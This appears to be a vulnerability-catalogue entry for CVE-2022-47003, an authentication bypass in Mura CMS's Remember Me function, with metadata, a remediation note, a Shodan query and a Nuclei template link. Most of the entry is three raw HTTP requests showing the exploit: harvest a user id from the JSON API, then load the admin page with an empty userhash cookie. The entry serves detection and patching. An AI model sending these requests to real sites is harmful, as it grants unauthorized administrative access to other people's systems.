| Title | Mura CMS <10.0.580 - Authentication Bypass |
|---|---|
| Author | iamnoooob,rootxharsh,pdresearch |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application. |
| Remediation | Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.30275 |
| CVE ID | CVE-2022-47003 |
| CWE ID | CWE-863 |
| Shodan Query | Generator: Mura CMSgenerator: mura cms |
| Tags | cve cve2022 auth-bypass cms mura murasoftware vuln |
Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept-Encoding: gzip
GET /index.cfm/_api/json/v1/Pg5D55/content/?fields=lastupdatebyid HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.6
Connection: close
Accept-Encoding: gzip
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Cookie: userid=GU8ESD; userhash=
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47003.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-47003.pcap
N/AN/A